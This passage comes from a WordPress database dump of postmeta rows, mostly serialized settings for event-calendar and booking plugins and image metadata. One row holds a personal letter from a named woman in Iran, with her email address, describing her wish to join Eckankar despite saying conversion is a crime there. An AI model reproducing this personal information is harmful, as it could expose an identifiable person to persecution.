;i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139252,264650,'boldgrid_hide_page_title','0'),(139269,264650,'_RTECwhoCanRegister','any'),(139239,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139241,264650,'_EventOrigin','events-calendar'),(139242,264650,'_EventOrigin','events-calendar'),(139243,264650,'_EventOrigin','events-calendar'),(139244,264650,'_EventOrigin','events-calendar'),(139245,264650,'_EventOrigin','events-calendar'),(139246,264650,'_EventOrigin','events-calendar'),(139247,264650,'_EventOrigin','events-calendar'),(139248,264650,'_EventOrigin','events-calendar'),(139249,264650,'_EventOrigin','events-calendar'),(139250,264650,'_EventOrigin','events-calendar'),(139251,264650,'_thumbnail_id','264651'),(139240,264650,'_EventOrigin','events-calendar'),(139270,264650,'_RTEClimitRegistrations','0'),(139271,264650,'_RTECmaxRegistrations','30'),(139272,264650,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(139273,264650,'_RTECnumRegistered','0'),(139274,264650,'_EventVenueID','262435'),(139276,264650,'_dp_original','263641'),(139277,264650,'_edit_lock','1620590689:2'),(139278,264651,'_wp_attached_file','2021/04/eagle-flying-2.jpg'),(139279,264651,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:552;s:6:\"height\";i:345;s:4:\"file\";s:26:\"2021/04/eagle-flying-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"eagle-flying-2-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"eagle-flying-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"eagle-flying-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"eagle-flying-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"eagle-flying-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"eagle-flying-2-300x345.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"eagle-flying-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(139280,264650,'_edit_last','2'),(139281,264650,'_oembed_c0ed44d4b4f8f387a25cfa556dceb09e','{{unknown}}'),(181289,268406,'mec_ticket_variations_global_inheritance','1'),(181290,268406,'mec_ticket_variations','a:0:{}'),(181291,268406,'mec_reg_fields_global_inheritance','1'),(181292,268406,'mec_reg_fields','a:0:{}'),(181293,268406,'mec_bfixed_fields','a:0:{}'),(181294,268406,'mec_op','a:0:{}'),(181295,268406,'mec_fields','a:0:{}'),(181296,268406,'mec_event_status','EventScheduled'),(181297,268406,'mec_moved_online_link',''),(181298,268406,'mec_cancelled_reason',''),(181299,268406,'mec_display_cancellation_reason_in_single_page',''),(181300,268406,'boldgrid_hide_page_title','0'),(181301,268406,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(181302,268406,'passster_activate_global_protection',NULL),(181303,268406,'passster_activate_protection',NULL),(181304,268406,'passster_protection_type','password'),(181305,268406,'boldgrid_in_page_containers','1'),(181308,268406,'_dp_original','268250'),(181307,268406,'passster_area_shortcode',''),(181309,268406,'_edit_lock','1687289805:2'),(181310,268406,'_edit_last','2'),(181311,268407,'_wp_attached_file','2023/04/eck-wisdom-solving-probs.jpg'),(181288,268406,'mec_fees','a:0:{}'),(181287,268406,'mec_fees_global_inheritance','1'),(181286,268406,'mec_tickets','a:0:{}'),(143676,265159,'protect_children',''),(143677,265159,'protect_children',''),(143678,265159,'mec_color',''),(143679,265159,'mec_location_id','119'),(143680,265159,'mec_dont_show_map','1'),(142879,265063,'sg_popup_target_custom','a:1:{i:0;s:6:\"265067\";}'),(142880,265063,'sgpb_popup_events_custom','a:1:{i:265067;a:1:{i:0;s:5:\"click\";}}'),(145659,265446,'protect_children',''),(142817,265064,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:28148;s:12:\"smushed-size\";i:26356;s:15:\"savings-percent\";d:6.37000000000000010658141036401502788066864013671875;}'),(142816,265064,'smush-info','The file was compressed from 27.49 KB to 25.74 KB saving 6.37 percent using WP-Optimize'),(142815,265064,'smush-complete','1'),(143445,265131,'_field_138','To whom it may concern,\nI am Pegah Hashemi Hosseini from Iran country and this is the first time that I’m writing a letter to you.\nAbout five years ago I became familiar with ECKANKAR, by my husband. Then I started reading about ECKANKAR. I found that I love it and from the past always I had have the inner attraction to it.\nI searched in internet and read more and more about ECKANKAR and I saw MAHANTA’s picture, even I dreamed once that he gave me a book with two coupons to buy books and he told me that I should read books about ECKANKAR.\nAfter that dream, I started to read some translated books about ECKANKAR and about Sri Harold Klemp.  After reading a few books, I came to believe in the presence of Light and Sound in all stages of my life from the past to the present.\nCertainly you are aware of all the restrictions imposed on us by the government. We, the people of Iran, don’t have any religious freedom. In our country we have to be Muslim and any change of religion in this country is a crime. \nDue to the religious restrictions that exist in our country, there is no place for ECKANKAR followers to be able to read books freely and pass discourses. I want to be able to be a member of ECKANKAR and freely talk about it, about my experiences and dreams and hear the experiences of others, but in this country I do not have that possibility. In my country, even having and reading ECKANKAR books is a crime.\nFirst of alI, I want to know that if I have been accepted as a Chela or member of ECKANKAR? And I want to know how I can be a member of ECKANKAR?  What should I do?\nI have written this letter for you to show me the way and if it is possible guide me. \nI will be so glad to hear the response from you.\nThis is my E-mail address:  pegah_hashemi1526@yahoo.com\nWith love, in ECK.\nPegah\n'),(143444,265131,'_field_137','LETTER TO ECKANKAR-COLORADO'),(143443,265131,'_field_135','PEGAH_HASHEMI1526@YAHOO.COM'),(143442,265131,'_field_134','HASHEMI HOSSEINI'),(142659,265037,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:60752;s:12:\"smushed-size\";i:19110;s:15:\"savings-percent\";d:68.5400000000000062527760746888816356658935546875;}'),(142658,265037,'smush-info','The file was compressed from 59.33 KB to 18.66 KB saving 68.54 percent using WP-Optimize'),(142634,265037,'_wp_attached_file','2021/05/blog-1.png'),(142635,265037,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:178;s:6:\"height\";i:176;s:4:\"file\";s:18:\"2021/05/blog-1.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"blog-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144591,265247,'mec_countdown_method','global'),(144590,265247,'mec_start_time_hour','7'),(144589,265247,'mec_start_date','2021-08-11'),(144588,265247,'mec_public','1'),(159235,266537,'_field_534','Beautify Day'),(139381,264678,'_EventOrigin','events-calendar'),(139382,264678,'protect_children',''),(139383,264678,'protect_children',''),(139384,264678,'protect_children',''),(139385,264678,'protect_children',''),(139386,264678,'protect_children',''),(139387,264678,'protect_children',''),(139388,264678,'protect_children',''),(139389,264678,'protect_children',''),(139390,264678,'protect_children',''),(139391,264678,'protect_children',''),(139392,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139427,264678,'_EventCost',''),(139393,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139426,264678,'_EventCurrencyPosition','prefix'),(139394,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139425,264678,'_EventCurrencySymbol',''),(139395,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139424,264678,'_EventDuration','3600'),(139428,264678,'_EventURL',''),(139396,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139423,264678,'_EventEndDateUTC','2021-05-25 02:00:00'),(139429,264678,'_EventTimezone','America/Denver'),(139397,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139422,264678,'_EventStartDateUTC','2021-05-25 01:00:00'),(139430,264678,'_EventTimezoneAbbr','MDT'),(139398,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139421,264678,'_EventEndDate','2021-05-24 20:00:00'),(139431,264678,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(139399,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139420,264678,'_EventStartDate','2021-05-24 19:00:00'),(139432,264678,'_RTECregistrationsDisabled','1'),(139400,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139419,264678,'_EventShowMap',''),(139433,264678,'_RTECdeadlineType','start'),(139401,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139418,264678,'_EventShowMapLink',''),(139434,264678,'_RTECwhoCanRegister','any'),(139402,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i